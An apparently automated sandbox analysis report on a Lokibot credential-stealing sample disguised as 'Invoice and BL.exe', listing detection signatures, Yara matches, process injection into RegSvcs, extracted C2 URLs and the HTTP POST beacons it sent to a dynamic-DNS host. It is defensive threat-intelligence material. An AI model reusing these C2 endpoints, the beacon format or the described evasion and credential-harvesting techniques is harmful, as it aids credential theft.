
Windows Analysis Report: Invoice and BL.exe

Overview

General Information

Sample Name: Invoice and BL.exe
Analysis ID: 458970
MD5: 3c7b342067f6142e6ed45551f5f60c50
SHA1: d83513aa4ac743b7fe0f7d1052a37b5ef1b50f60
SHA256: 419865b95d9a00faea2d00122baabd7c2ea0be23dd5d3f15eae589bb5a6beecd
Tags: exe, Loki

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign process
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected aPLib compressed binary
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Process Tree

  • System is w10x64
  • Invoice and BL.exe (PID: 1152 cmdline: 'C:\Users\user\Desktop\Invoice and BL.exe' MD5: 3C7B342067F6142E6ED45551F5F60C50)
    • RegSvcs.exe (PID: 5412 cmdline: {path} MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp | Loki_1 | Loki Payload | kevoreilly
  • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x153fc:$a2: last_compatible_version
00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x13bff:$des3: 68 03 66 00 00
  • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00

        Unpacked PEs

Source | Rule | Description | Author
0.2.Invoice and BL.exe.397e408.3.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x13278:$s1: http://
  • 0x16233:$s1: http://
  • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13280:$s2: https://
  • 0x13278:$f1: http://
  • 0x16233:$f1: http://
  • 0x13280:$f2: https://
0.2.Invoice and BL.exe.397e408.3.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
0.2.Invoice and BL.exe.397e408.3.unpack | Loki_1 | Loki Payload | kevoreilly
  • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x133fc:$a2: last_compatible_version
0.2.Invoice and BL.exe.397e408.3.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x123ff:$des3: 68 03 66 00 00
  • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
7.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            AV Detection:

Found malware configuration
Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp | Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
Multi AV Scanner detection for domain / URL
Source: abixmaly.duckdns.org | Virustotal: Detection: 10%
Source: http://abixmaly.duckdns.org/binge/fre.php | Virustotal: Detection: 13%
Multi AV Scanner detection for submitted file
Source: Invoice and BL.exe | Virustotal: Detection: 59%
Source: Invoice and BL.exe | Metadefender: Detection: 31%
Source: Invoice and BL.exe | ReversingLabs: Detection: 60%
Machine Learning detection for sample
Source: Invoice and BL.exe | Joe Sandbox ML: detected
Source: Invoice and BL.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Invoice and BL.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000007.00000002.294503842.0000000000832000.00000002.00020000.sdmp
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW

            Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.top/alien/fre.php
Uses dynamic DNS services
Source: unknown | DNS query: name: abixmaly.duckdns.org
Source: Joe Sandbox View | IP Address: 192.169.69.26
Source: Joe Sandbox View | ASN Name: WOWUS
Source: global traffic | HTTP traffic detected (two identical requests):
    POST /binge/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: abixmaly.duckdns.org
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: D82FEB54
    Content-Length: 190
    Connection: close
Source: global traffic | HTTP traffic detected:
    POST /binge/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: abixmaly.duckdns.org
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: D82FEB54
    Content-Length: 163
    Connection: close
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00404ED4 recv
Source: unknown | DNS traffic detected: queries for: abixmaly.duckdns.org
Source: unknown | HTTP traffic detected:
    POST /binge/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: abixmaly.duckdns.org
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: D82FEB54
    Content-Length: 190
    Connection: close
Source: RegSvcs.exe, 00000007.00000002.294776027.0000000000F64000.00000004.00000020.sdmp | String found in binary or memory: http://abixmaly.duckdns.org/binge/fre.php
Source: RegSvcs.exe, 00000007.00000002.294755116.0000000000F48000.00000004.00000020.sdmp | String found in binary or memory: http://abixmaly.duckdns.org/binge/fre.phpNg
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: RegSvcs.exe, RegSvcs.exe, 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn

            System Summary:

Malicious sample detected (through community Yara rule)
Source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
.NET source code contains very large strings
Source: Invoice and BL.exe, NodeGraphControl/NodeGraphNode.cs | Long String: Length: 24686
Source: 0.2.Invoice and BL.exe.370000.0.unpack, NodeGraphControl/NodeGraphNode.cs | Long String: Length: 24686
Source: 0.0.Invoice and BL.exe.370000.0.unpack, NodeGraphControl/NodeGraphNode.cs | Long String: Length: 24686
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: Invoice and BL.exe
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD7C23
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD0208
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD25B8
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD5B90
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD5918
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD1140
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD1C98
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD1620
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD1622
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD3610
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD0006
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD2A50
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD1C50
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD1640
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD0040
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD11B9
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD25B3
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD2F98
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD5590
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD5B8C
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD2F88
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD5580
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD01F9
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD35C5
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD113C
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD1524
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD5908
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_0279C124
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_0279E570
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_0279E560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0040549C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_004029D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0041219C appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 00405B6F appears 42 times
Source: Invoice and BL.exe, 00000000.00000002.290027759.00000000039B8000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs Invoice and BL.exe
Source: Invoice and BL.exe, 00000000.00000002.288539858.00000000003F4000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamesH7BDA6.exeD vs Invoice and BL.exe
Source: Invoice and BL.exe, 00000000.00000002.298627197.0000000008520000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs Invoice and BL.exe
Source: Invoice and BL.exe, 00000000.00000002.289489186.0000000002ACA000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameResource_Meter.dll> vs Invoice and BL.exe
Source: Invoice and BL.exe | Binary or memory string: OriginalFilenamesH7BDA6.exeD vs Invoice and BL.exe
Source: Invoice and BL.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/3@3/1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize
Source: C:\Users\user\Desktop\Invoice and BL.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice and BL.exe.log
Source: C:\Users\user\Desktop\Invoice and BL.exe | Mutant created: \Sessions\1\BaseNamedObjects\qnrJUclcstb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: Invoice and BL.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Invoice and BL.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\Invoice and BL.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File read: C:\Windows\System32\drivers\etc\hosts (4 identical events)
Source: Invoice and BL.exe | Virustotal: Detection: 59%
Source: Invoice and BL.exe | Metadefender: Detection: 31%
Source: Invoice and BL.exe | ReversingLabs: Detection: 60%
Source: unknown | Process created: C:\Users\user\Desktop\Invoice and BL.exe 'C:\Users\user\Desktop\Invoice and BL.exe'
Source: C:\Users\user\Desktop\Invoice and BL.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
Source: C:\Users\user\Desktop\Invoice and BL.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Source: Invoice and BL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Invoice and BL.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000007.00000002.294503842.0000000000832000.00000002.00020000.sdmp
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe

            Data Obfuscation:

.NET source code contains potential unpacker
Source: Invoice and BL.exe, NodeGraphControl/frmGiris.cs | .Net Code: X_123123454363 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.Invoice and BL.exe.370000.0.unpack, NodeGraphControl/frmGiris.cs | .Net Code: X_123123454363 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.Invoice and BL.exe.370000.0.unpack, NodeGraphControl/frmGiris.cs | .Net Code: X_123123454363 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Yara detected aPLib compressed binary
Source: Yara match | File source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Invoice and BL.exe PID: 1152, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5412, type: MEMORYSTR
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD2A48 push esp; iretd 0_2_00BD2A49
Source: C:\Users\user\Desktop\Invoice and BL.exe | Code function: 0_2_00BD67A6 push esp; retf 0021h 0_2_00BD67A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00402AC0 push eax; ret 7_2_00402AD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00402AC0 push eax; ret 7_2_00402AFC
Source: initial sample | Static PE information: section name: .text entropy: 7.07527531972
Source: C:\Users\user\Desktop\Invoice and BL.exe | Process information set: NOOPENFILEERRORBOX (28 identical events)
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
